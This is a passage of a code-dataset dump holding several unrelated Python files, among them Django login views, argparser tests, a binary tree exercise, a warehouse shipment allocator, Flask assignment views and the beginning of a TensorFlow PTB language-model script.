NULL\t\n\"\"\"\n","sub_path":"MBL/MLB_project.py","file_name":"MLB_project.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"618747241","text":"# coding: utf-8\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom . import models\nimport re\nimport random\nimport io\nimport json, pickle\nimport rsa\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n# Create your views here.\n\n\ndef login_page(request):\n return render(request, 'login/login_page.html')\n\n\ndef register_page(request):\n return render(request, 'login/register_page.html')\n\n\ndef login_handle(request):\n user_name = request.POST.get('userName')\n passwd = request.POST.get('passwd')\n verify_code = request.POST.get('verifycode').upper()\n if verify_code == request.session['verifycode']:\n user = auth.authenticate(request, username=user_name, password=passwd)\n if user is not None:\n auth.login(request, user)\n return HttpResponse('vaild')\n else:\n return HttpResponse(None)\n else:\n return HttpResponse('VerifyError')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/login/login_page')\n\n\ndef check_username(request):\n if request.is_ajax():\n user_name = request.POST.get('userName')\n exist = User.objects.filter(username=user_name)\n if exist:\n return HttpResponse(True)\n else:\n return HttpResponse(False)\n\n\ndef register_handle(request):\n user_name = request.POST.get('userName')\n passwd = request.POST.get('passwd')\n verifycode = request.POST.get('verifycode').upper()\n if verifycode == request.session['verifycode']:\n if not User.objects.filter(username=user_name):\n if re.match('^[\\x21-\\x7d]{6,16}$', passwd, re.S):\n new_user = User.objects.create_user(username=user_name, password=passwd)\n new_user.save()\n return HttpResponse('succeed')\n else:\n return HttpResponse('密码格式错误')\n else:\n return HttpResponse('用户名已存在')\n return HttpResponse('验证码不正确')\n\n\ndef user_center(request):\n if request.user.is_authenticated:\n user = User.objects.get(username=request.user)\n try:\n info = user.userinfo\n except Exception:\n info = None\n return render(request, 'login/user_center.html', {'userInfo': info})\n return HttpResponse(None)\n\n\ndef info_handle(request):\n if request.user.is_authenticated:\n user = User.objects.get(username=request.user)\n name = request.POST.get('name')\n telephone = request.POST.get('telephone')\n address = request.POST.get('address')\n try:\n user_info = user.userinfo\n\n except Exception:\n\n user_info = models.UserInfo(user=user)\n\n user_info.full_name = name\n user_info.telephone = telephone\n user_info.address = address\n user_info.save()\n return HttpResponse('ok')\n\n\ndef my_order(request):\n orders = models.UserOrder.objects.filter(user=request.user)\n data = []\n for order in orders:\n shop_list = json.loads(order.shop)\n info = []\n for shop in shop_list:\n shop_id = shop['shop_id']\n count = shop['count']\n shop_object = models.ShopInfo.objects.get(id=shop_id)\n info.append([shop_object, count])\n data.append({'order': order, 'info': info})\n return render(request, 'login/my_order.html', {'data': data})\n\n\ndef verifycode(request):\n # 定义变量,用于画面的背景色、宽、高\n bgcolor = (random.randrange(20, 100), random.randrange(\n 20, 100), 255)\n width = 100\n height = 25\n # 创建画面对象\n im = Image.new('RGB', (width, height), bgcolor)\n # 创建画笔对象\n draw = ImageDraw.Draw(im)\n # 调用画笔的point()函数绘制噪点\n for i in range(0, 100):\n xy = (random.randrange(0, width), random.randrange(0, height))\n fill = (random.randrange(0, 255), 255, random.randrange(0, 255))\n draw.point(xy, fill=fill)\n # 定义验证码的备选值\n str1 = 'ABCD123EFGHIJK456LMNOPQRS789TUVWXYZ0'\n # 随机选取4个值作为验证码\n rand_str = ''\n for i in range(0, 4):\n rand_str += str1[random.randrange(0, len(str1))]\n # 构造字体对象\n font = ImageFont.truetype('FreeMono.ttf', 23)\n # 构造字体颜色\n fontcolor = (255, random.randrange(0, 255), random.randrange(0, 255))\n # 绘制4个字\n draw.text((5, 2), rand_str[0], font=font, fill=fontcolor)\n draw.text((25, 2), rand_str[1], font=font, fill=fontcolor)\n draw.text((50, 2), rand_str[2], font=font, fill=fontcolor)\n draw.text((75, 2), rand_str[3], font=font, fill=fontcolor)\n # 释放画笔\n del draw\n # 存入session,用于做进一步验证\n request.session['verifycode'] = rand_str\n # 内存文件操作\n buf = io.BytesIO()\n # 将图片保存在内存中,文件类型为png\n im.save(buf, 'png')\n # 将内存中的图片数据返回给客户端,MIME类型为图片png\n return HttpResponse(buf.getvalue(), 'image/png')","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"614425451","text":"import itertools\nimport json\nfrom dataclasses import asdict\n\nimport errors\nimport pytest\nfrom processor.core.argparser import create_common_project_parser, create_common_vcs_parser, read_config, write_config\nfrom processor.core.docker import Worktree\n\nCONFIG_NAME = \".defects4cpp.json\"\n\n\ndef test_read_config_not_exist(tmp_path):\n with pytest.raises(errors.DppArgparseFileNotFoundError):\n read_config(str(tmp_path / \"foo.json\"))\n\n\ndef test_read_config_invalid_json(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n fp.write(\"hello, world!\")\n\n with pytest.raises(errors.DppArgparseInvalidConfigError):\n read_config(tmp_path)\n\n\ndef test_read_config_corrupted_json(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n obj = {\"foo\": 1}\n json.dump(obj, fp)\n\n with pytest.raises(errors.DppArgparseConfigCorruptedError):\n read_config(tmp_path)\n\n\ndef test_read_config(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n obj = {\n \"project_name\": \"yara\",\n \"index\": 1,\n \"buggy\": False,\n \"workspace\": str(tmp_path),\n }\n json.dump(obj, fp)\n\n metadata, worktree = read_config(tmp_path)\n\n assert metadata.name == obj[\"project_name\"]\n assert worktree.project_name == obj[\"project_name\"]\n assert worktree.index == obj[\"index\"]\n assert worktree.buggy == obj[\"buggy\"]\n assert worktree.workspace == obj[\"workspace\"]\n\n\ndef test_write_config(tmp_path):\n worktree = Worktree(\"yara\", 1, True, str(tmp_path / \"imaginary_path\"))\n\n with pytest.raises(errors.DppArgparseFileNotFoundError):\n write_config(worktree)\n\n p = tmp_path / \"yara\" / \"buggy#1\"\n p.mkdir(parents=True)\n\n worktree = Worktree(\"yara\", 1, True, str(tmp_path))\n write_config(worktree)\n\n with open(p / CONFIG_NAME, \"r\") as fp:\n config = json.load(fp)\n\n assert asdict(worktree) == config\n\n\ndef test_project_parser_invalid_project_should_throw(tmp_path):\n parser = create_common_project_parser()\n\n with pytest.raises(errors.DppArgparseNotProjectDirectory):\n parser.parse_args(f\"{tmp_path} --coverage\".split())\n\n\ndef test_project_parser_should_read_config_json(tmp_path):\n parser = create_common_project_parser()\n project_name = \"yara\"\n\n with open(tmp_path / CONFIG_NAME, \"w+\") as fp:\n obj = {\n \"project_name\": project_name,\n \"index\": 1,\n \"buggy\": False,\n \"workspace\": str(tmp_path),\n }\n json.dump(obj, fp)\n\n args = parser.parse_args(f\"{tmp_path} --coverage\".split())\n\n assert hasattr(args, \"metadata\")\n assert args.metadata.name == project_name\n assert hasattr(args, \"worktree\")\n assert not args.worktree.buggy\n assert args.worktree.index == 1\n assert args.path == str(tmp_path)\n\n\ndef test_vcs_parser_invalid_project_should_throw():\n parser = create_common_vcs_parser()\n\n with pytest.raises(SystemExit):\n parser.parse_args(\"foobar 1 --buggy\".split())\n\n\n@pytest.mark.parametrize(\"cmd_line\", [\"yara 1 --buggy\", \"yara --buggy 1\"])\ndef test_vcs_parser_unordered_arguments_should_be_handled(cmd_line):\n parser = create_common_vcs_parser()\n\n args = parser.parse_args(cmd_line.split())\n metadata = args.metadata\n worktree = args.worktree\n\n assert metadata.name == \"yara\"\n assert worktree.index == 1\n assert worktree.buggy\n\n\ndef test_vcs_parser_unordered_arguments_should_be_handled_with_target_option():\n parser = create_common_vcs_parser()\n arguments = [\"1\", \"--buggy\", \"--target=/home/test\"]\n\n for argument in itertools.permutations(arguments):\n args = parser.parse_args([\"yara\", *argument])\n metadata = args.metadata\n worktree = args.worktree\n\n assert metadata.name == \"yara\"\n assert worktree.index == 1\n assert worktree.buggy\n assert worktree.workspace == \"/home/test\"\n","sub_path":"tests/processor/test_argparse.py","file_name":"test_argparse.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347457571","text":"#binary tree\n\nclass Node:\n def __init__(self, data) -> None:\n self.right = None\n self.left = None\n self.data = data\n\n def CreateTree(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.CreateTree(data)\n else:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.CreateTree(data)\n else:\n self.data = data\n \n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print( self.data)\n if self.right:\n self.right.PrintTree()\n # binary tree traversal\n\n # inorder traversal\n def inordertraversal( self, root):\n res = []\n if root:\n res = res + self.inordertraversal(root.left)\n res.append(root.data)\n res = res + self.inordertraversal(root.right) \n return res\n # pre order traversal\n def preordertraversal(self, root):\n res = []\n if root:\n res.append(root.data)\n res = res + self.preordertraversal(root.left)\n res = res + self.preordertraversal(root.right)\n return res\n def postordertraversal(self, root):\n res = []\n if root:\n res.append(root.data)\n res = res + self.preordertraversal(root.right)\n res = res + self.preordertraversal(root.left)\n return res\n\n # print only left view binary tree\n\ndef leftView(root, level, dict):\n # base case\n if root is None:\n return\n # insert the current node and level information into the map\n dict[level] = root.data\n \n # recur for the right subtree before the left subtree\n leftView(root.right, level + 1, dict)\n leftView(root.left, level + 1, dict)\n return dict\n\ndef printTree(node, level=0):\n if node != None:\n printTree(node.left, level + 1)\n print(' ' * 4 * level + '->', node.data)\n printTree(node.right, level + 1)\n\n\n\n\ndef main():\n #creating tree\n root = Node(10)\n root.CreateTree(5)\n root.CreateTree(15)\n # root.CreateTree(1)\n # root.CreateTree(10)\n # root.CreateTree(9)\n # root.CreateTree(200)\n #printTree\n printTree(root)\n print(root.inordertraversal(root))\n #print(root.preordertraversal(root))\n #print(root.postordertraversal(root))\n #print(leftView(root,1,{}))\n \nif __name__=='__main__':\n main()\n\n\n","sub_path":"binary_tree_all.py","file_name":"binary_tree_all.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"218892544","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torchvision import datasets, transforms\n\n\ndef mnist():\n transform = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))]\n )\n # exchange with the real mnist dataset\n trainset = datasets.MNIST(\n \"../../data/\", download=True, train=True, transform=transform\n )\n testset = datasets.MNIST(\n \"../../data/\", download=True, train=False, transform=transform\n )\n return trainset, testset\n\n\nmnist()\n","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169304943","text":"__author__ = 'Experiment'\n\nfrom src import old_functions as f\n\n# a = Focus.scan(70, 90, 50, 'Z', waitTime = .1)\n# sets the focus\n# a = f.Focus.scan(20, 90, 50, 'Z', waitTime = .1, APD=True)\n\n# a = f.Focus.scan(20, 90, 40, 'Z', waitTime = .1, APD=True)\n\n\nscan_range_roi = {\n \"dx\": 0.1,\n \"dy\": 0.1,\n \"xPts\": 20,\n \"xo\": 0.0,\n \"yPts\": 20,\n \"yo\": 0.0\n}\n\nif __name__ == '__main__':\n a = f.Focus.scan(32.5, 42.5, 40, 'Z', waitTime = .1, APD=True, scan_range_roi = scan_range_roi)","sub_path":"src/old_scripts/scan_focus.py","file_name":"scan_focus.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268046315","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAn implementation of the Enum data type\n\"\"\"\nfrom __future__ import unicode_literals\n\n\n# For use with deployment statuses\n# https://stackoverflow.com/a/1695250\ndef enum(*sequential, **named):\n \"\"\"An implementation of the Enum data type\n\n Usage\n myEnum= enum(\n 'Apple'\n , 'Banana')\n \"\"\"\n enums = dict(zip(sequential, range(len(sequential))), **named)\n reverse = dict((value, key) for key, value in list(enums.items()))\n enums['reverse_mapping'] = reverse\n return type(str('Enum'), (), enums)\n","sub_path":"processrunner/enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313119141","text":"from typing import List, Dict\nimport collections\n\n\ndef cheapest_shipment(all_orders: Dict[str, int], warehouses: List[Dict]) -> List[Dict[str,Dict[str,int]]]:\n \"\"\"\n preconditions:\n - assume warehouses presorted based on cost\n - assume integer arguments are 32 bit signed, <=2^32 -1\n - assume integer arguments in items are > 0; invalid order if ordering <= 0 of an item\n - assume integer arguments in warehouses >= 0\n - assume every top level dictionary object in warehouses have distinct\n 'name' value associated with its 'name' key\n -assume valid schema for input\n \"\"\"\n # either arguments are empty, impossible to fufill a shipment\n if not all_orders or not warehouses:return []\n # initialize global shipment container\n shipment = collections.defaultdict(dict)\n for key,val in all_orders.items():\n count = 0\n # initialize shipment container for warehouse & invetory for order item key\n item_warehouse_shipments = collections.defaultdict(dict)\n # greedily select items from lowest cost warehouse to next\n for warehouse in warehouses:\n if key in warehouse['inventory'] and warehouse['inventory'][key]>0:\n if warehouse['inventory'][key] + count >=val:\n item_warehouse_shipments[warehouse['name']][key] = val-count\n count = val\n break\n else:\n item_warehouse_shipments[warehouse['name']][key] = warehouse['inventory'][key]\n count+=warehouse['inventory'][key]\n #update global shipments if current order has sufficient inventory\n if val == count:\n for name,warehouse_order in item_warehouse_shipments.items():\n shipment[name].update(warehouse_order)\n\n return [{key:val} for key,val in shipment.items()]\n\n\n\n\n","sub_path":"inventory-allocator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"91760733","text":"import math\n\n_x = input(\"podaj długość elementu: \")\n_y = input(\"Podaj szerokość elementu: \")\n_z = input(\"Podaj grubość elementu: \")\n_ro = input(\"Podaj gęstość piany [22, 24, 27, 35, 65, 100, MD]: \")\n_moq = input(\"Podaj MOQ: \")\n\ndef cena_materialu(): #Funkcja Zwraca cene zastosowanego materiału\n \n ceny = (260, 280, 300, 400, 750, 1300, 330) #ceny za materiały\n \n if _ro.upper() == \"MD\": #wybór materiału\n cena = ceny[6]\n elif int(_ro) == 22:\n cena = ceny[0]\n elif int(_ro) == 24:\n cena = ceny[1]\n elif int(_ro) == 27:\n cena = ceny[2]\n elif int(_ro) == 35:\n cena = ceny[3]\n elif int(_ro) == 65:\n cena = ceny[4]\n elif int(_ro) == 100:\n cena = ceny[5]\n else:\n print(\"Podane złe parametry!\")\n return float(cena)\n\ndef rozkroj_std(): #Funkcja określa ile sztuk zmieści się na wykrojniku \n ax = int(1180 / int(_x))\n ay = int(780 / int(_y))\n bx = int(780 / int(_x))\n by = int(1180 / int(_y))\n \n if (ax * ay) > (bx * by):\n return ax * ay\n elif (bx * by) > (ax * ay):\n return bx * by\n\ndef rozkroj():\n pass\n\ndef paletyzacja(): #określenie paletyzacji wyrobu\n szt_plt = round(1500 / int(_z) * rozkroj_std(), 0)\n return int(szt_plt)\n\n\ndef material(): #wartość wykorzystanego materiału\n mat = 800 * 1200 * int(_z) / 1000000000 * cena_materialu() / rozkroj_std()\n return round(mat, 3)\n\ndef stamping(): #koszt pracy prasy\n stamp = ((0.48 / rozkroj_std()) + (60 * (30/60) / int(_moq)))\n return round(stamp, 3)\n\ndef kitting(): #koszty palety i użytego stretchu\n paleta = 1\n stretch = 5\n kitting = (stretch / paletyzacja()) + (paleta / paletyzacja())\n return round(kitting, 3)\n\ndef logistyka(): #koszty logistyki wewnętrznej\n logistyka = (6 / paletyzacja()) + (2 / paletyzacja())\n return round(logistyka, 3)\n\ndef ovh(a, b): #overhead'y\n return a * b\n\ndef margin(d, m): #marża\n return d / m \n\ndef nasze_moq(pal,moq):\n if int(_moq) <= paletyzacja():\n return print(\"MOQ Deles:\", paletyzacja() , \"szt.\")\n else:\n return int(moq)\n\nmat_ovh_std = ovh(material(), 1.16)\nmat_ovh_min = ovh(material(), 1.06)\nstamp_ovh = ovh(stamping(), 1.25)\nkit_ovh = ovh(kitting(), 1.25)\nlog_ovh = ovh(logistyka(), 1.25)\n\nmat_mar_min = round(margin(mat_ovh_min, 0.91), 2)\nmat_mar_std = round(margin(mat_ovh_std, 0.78), 2)\nstamp_marg = round(margin(stamp_ovh, 0.8), 2)\nkit_mar = round(margin(kit_ovh, 0.8), 2)\nlog_mar = round(margin(log_ovh, 0.8), 2)\n\ncena_std = mat_mar_std + stamp_marg + kit_mar + log_mar\ncena_min = mat_mar_min + stamp_marg + kit_mar + log_mar\n\nprint(\"Cena startowa:\" , round(cena_std,2) , \"zł.\")\nprint(\"Cena minimalna:\" , round(cena_min,2) , \"zł.\")\nprint(\"Paletyzacja:\", paletyzacja() ,\"szt/plt.\")\nprint(\"Rozkrój:\", rozkroj_std())\n","sub_path":"PRODUKCJA.py","file_name":"PRODUKCJA.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507152857","text":"from flask import render_template, redirect, url_for, abort, flash, request,\\\n current_app, make_response\nfrom flask_login import login_required, current_user\nfrom flask_sqlalchemy import get_debug_queries\nfrom . import main\nfrom .forms import EditProfileForm, EditProfileAdminForm, AssignmentForm,\\\n QuestionForm\nfrom .. import db\nfrom ..models import School, Permission, Role, User, Assignment, StudentAssignment, SchoolUser, Class\nfrom ..decorators import admin_required, permission_required\n\n\n@main.after_app_request\ndef after_request(response):\n for query in get_debug_queries():\n if query.duration >= current_app.config['RWC_SLOW_DB_QUERY_TIME']:\n current_app.logger.warning(\n 'Slow query: %s\\nParameters: %s\\nDuration: %fs\\nContext: %s\\n'\n % (query.statement, query.parameters, query.duration,\n query.context))\n return response\n\n\n@main.route('/shutdown')\ndef server_shutdown():\n if not current_app.testing:\n abort(404)\n shutdown = request.environ.get('werkzeug.server.shutdown')\n if not shutdown:\n abort(500)\n shutdown()\n return 'Shutting down...'\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = AssignmentForm()\n\n if current_user.can(Permission.CREATE_ASSIGNMENT) and form.validate_on_submit():\n assign = Assignment(body=form.body.data)\n db.session.add(assign)\n db.session.commit()\n return redirect(url_for('.index'))\n\n page = request.args.get('page', 1, type=int)\n _show_assignments = False\n if current_user.is_authenticated:\n _show_assignments = bool(request.cookies.get('show_assignments', ''))\n\n if _show_assignments:\n query = StudentAssignment.query.filter(StudentAssignment.student_id == current_user.id)\n else:\n query = Assignment.query\n pagination = query.paginate(\n # pagination = query.order_by(Assignment.timestamp.desc()).paginate(\n page, per_page=current_app.config['RWC_ASSIGN_PER_PAGE'],\n error_out=False)\n assign = pagination.items\n return render_template('index.html', form=form, assignments=assign,\n show_assignments=_show_assignments, pagination=pagination)\n\n\n@main.route('/user/')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n page = request.args.get('page', 1, type=int)\n pagination = user.schools.paginate(\n page, per_page=current_app.config['RWC_ASSIGNMENTS_PER_PAGE'],\n error_out=False)\n schools = pagination.items\n return render_template('user.html', user=user, schools=schools,\n pagination=pagination)\n\n\n# TODO: not unique\n@main.route('/class/')\ndef _class(name):\n _class = Class.query.filter_by(name=name).first_or_404\n page = request.args.get('page', 1, type=int)\n pagination = _class.students.paginate(\n page, per_page=current_app.config['RWC_ASSIGNMENTS_PER_PAGE'],\n error_out=False)\n students = pagination.items\n teacher = _class.teacher\n assign = _class.assignments\n return render_template('class.html', name=name, students=students, teacher=teacher, assignment=assign,\n pagination=pagination)\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n# TODO: Update this\n\n\n@main.route('/assignment/', methods=['GET', 'POST'])\ndef assignment(id):\n _assignment = Assignment.query.get_or_404(id)\n\n form = AssignmentForm()\n \"\"\"\n if form.validate_on_submit():\n question = question(body=form.body.data,\n assignment=assignment,\n author=current_user._get_current_object())\n db.session.add(question)\n db.session.commit()\n flash('Your question has been published.')\n return redirect(url_for('.assignment', id=assignment.id, page=-1))\n \"\"\"\n page = request.args.get('page', 1, type=int)\n if page == -1:\n page = (_assignment.question.count() - 1) // \\\n current_app.config['RWC_QUESTIONS_PER_PAGE'] + 1\n pagination = _assignment.questions.order_by(assignment.timestamp.asc()).paginate(\n page, per_page=current_app.config['RWC_QUESTIONS_PER_PAGE'],\n error_out=False)\n q = pagination.items\n return render_template('assignment.html', assignment=[_assignment], form=form,\n questions=q, pagination=pagination)\n\n\n@main.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n assignment = Assignment.query.get_or_404(id)\n if current_user != assignment.author and \\\n not current_user.can(Permission.ADMIN):\n abort(403)\n form = AssignmentForm()\n if form.validate_on_submit():\n assignment.body = form.body.data\n db.session.add(assignment)\n db.session.commit()\n flash('The assignment has been updated.')\n return redirect(url_for('.assignment', id=assignment.id))\n form.body.data = assignment.body\n return render_template('edit_assignment.html', form=form)\n\n\n@main.route('/all')\n@login_required\ndef show_all():\n resp = make_response(redirect(url_for('.index')))\n resp.set_cookie('show_all', '', max_age=30*24*60*60)\n return resp\n\n\n@main.route('/assignments')\n@login_required\ndef show_assignments():\n resp = make_response(redirect(url_for('.index')))\n resp.set_cookie('show_assignments', '1', max_age=30*24*60*60)\n return resp\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271111891","text":"#!/usr/bin/env python\n\n# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Example / benchmark for building a PTB LSTM model.\n\nTrains the model described in:\n(Zaremba, et. al.) Recurrent Neural Network Regularization\nhttp://arxiv.org/abs/1409.2329\n\nThere are 3 supported model configurations:\n===========================================\n| config | epochs | train | valid | test\n===========================================\n| small | 13 | 37.99 | 121.39 | 115.91\n| medium | 39 | 48.45 | 86.16 | 82.07\n| large | 55 | 37.87 | 82.62 | 78.29\nThe exact results may vary depending on the random initialization.\n\nThe hyperparameters used in the model:\n- init_scale - the initial scale of the weights\n- learning_rate - the initial value of the learning rate\n- max_grad_norm - the maximum permissible norm of the gradient\n- num_layers - the number of LSTM layers\n- num_steps - the number of unrolled steps of LSTM\n- hidden_size - the number of LSTM units\n- max_epoch - the number of epochs trained with the initial learning rate\n- max_max_epoch - the total number of epochs for training\n- keep_prob - the probability of keeping weights in the dropout layer\n- lr_decay - the decay of the learning rate for each epoch after \"max_epoch\"\n- batch_size - the batch size\n\nThe data required for this example is in the data/ dir of the\nPTB dataset from Tomas Mikolov's webpage:\n\n$ wget http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz\n$ tar xvf simple-examples.tgz\n\nTo run:\n\n$ python ptb_word_lm.py --data_path=simple-examples/data/\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport time\nimport json\nimport numpy as np\nimport tensorflow as tf\nimport sys\nfrom scipy.ndimage.interpolation import shift\n# We put config in a separate file so that loading a config object does (using pickle)\n# import this file twice (which triggers error)\nfrom config import *\n\n# Using our custom reader\nimport reader\n\n# same tokenization as training set\nimport sentence_cleaner\n\nACTIONS = [\"test\", \"train\", \"ppl\", \"predict\", \"continue\", \"loglikes\", \"probs\", \"export\"]\nLOSS_FCTS = [\"softmax\", \"nce\", \"sampledsoftmax\"]\n\nMODEL_PARAMS_INT = [\n \"max_grad_norm\"\n \"num_layers\",\n \"num_steps\",\n \"hidden_size\",\n \"max_epoch\",\n \"max_max_epoch\",\n \"batch_size\",\n \"vocab_size\"]\nMODEL_PARAMS_FLOAT = [\n \"init_scale\",\n \"learning_rate\",\n \"keep_prob\",\n \"lr_decay\"]\n\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\"model_dir\", \"model\", \"model_dir (containing ckpt files and word_to_id)\")\nflags.DEFINE_string(\"action\", \"test\", \"should we train or test. Possible options are: %s\" % \", \".join(ACTIONS))\nflags.DEFINE_string(\n \"config\", None,\n \"A type of model. Possible options are: 'small', 'medium', 'large' or path to config file.\")\nflags.DEFINE_string(\"data_path\", None,\n \"Where the training/test data is stored.\")\nflags.DEFINE_string(\"loss\", \"softmax\",\n \"The loss function to use. Possible options are %s\" % \", \".join(LOSS_FCTS))\nflags.DEFINE_bool(\"use_fp16\", False,\n \"Train using 16-bit floats instead of 32bit floats\")\n\nflags.DEFINE_bool(\"nosave\", False, \"Set to force model not to be saved\")\nflags.DEFINE_integer(\"log\", 10, \"How often to print information and save model: each (epoch_size/log) steps. (--log 100: each 1% --log 50: each 2%, --log 10: each 10% etc\")\n\nflags.DEFINE_float(\"threshold\", 100., \"cutoff for perplexity or loglikes or probs value\")\nflags.DEFINE_bool(\"debug\", False, \"dump sentence pairs\")\n\nfor param in MODEL_PARAMS_INT:\n flags.DEFINE_integer(param, None, \"Manually set model %s\" % param)\nfor param in MODEL_PARAMS_FLOAT:\n flags.DEFINE_float(param, None, \"Manually set model %s\" % param)\nMODEL_PARAMS = MODEL_PARAMS_INT + MODEL_PARAMS_FLOAT\n\n\nFLAGS = flags.FLAGS\n\n\ndef data_type():\n return tf.float16 if FLAGS.use_fp16 else tf.float32\n\n\n\n\n\nclass Model(object):\n \"\"\"The model.\"\"\"\n\n def __init__(self, is_training, config, loss_fct=\"softmax\", test_opti=False):\n self.config = config\n self.batch_size = batch_size = config.batch_size\n self.num_steps = num_steps = config.num_steps\n size = config.hidden_size\n self.vocab_size = vocab_size = config.vocab_size\n self.loss_fct = loss_fct\n self.is_training = is_training\n\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(size, forget_bias=0.0, state_is_tuple=True)\n if is_training and config.keep_prob < 1:\n lstm_cell = tf.nn.rnn_cell.DropoutWrapper(\n lstm_cell, output_keep_prob=config.keep_prob)\n cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * config.num_layers, state_is_tuple=True)\n\n self._initial_state = cell.zero_state(batch_size, data_type())\n\n with tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\n \"embedding\", [vocab_size, size], dtype=data_type())\n inputs = tf.nn.embedding_lookup(embedding, self._input_data)\n\n if is_training and config.keep_prob < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob)\n\n\n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(1, num_steps, inputs)]\n outputs, state = tf.nn.rnn(cell=cell, inputs=inputs, initial_state=self._initial_state)\n output = tf.reshape(tf.concat(1, outputs), [-1, size])\n\n # We are not masking loss anyway, so it is basically only ones\n # Still may change in near future\n mask = tf.ones([self.batch_size * self.num_steps])\n\n if test_opti:\n # If test_opti is True we assume that the model has w_t variable\n # this makes a huge performance improvement (especially on large model/vocab\n # but require model weights to be transposed.\n # See transpose.py\n self.w_t = w_t = tf.get_variable(\"w_t\", [size, vocab_size], dtype=data_type())\n self.b = b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n loss, logits, probs = self.softmax(output, w_t, b, mask)\n self.logits = logits\n self.probs = probs\n\n elif not is_training or self.loss_fct == \"softmax\":\n # Regular testing using softmax and default \"w\" weights matrix\n # It may be really slower than 'test_opti'\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n w_t = tf.transpose(w)\n\n loss, logits, probs = self.softmax(output, w_t, b, mask)\n self.logits = logits\n self.probs = probs\n\n elif self.loss_fct == \"nce\":\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n num_samples = 64\n labels = tf.reshape(self._targets, 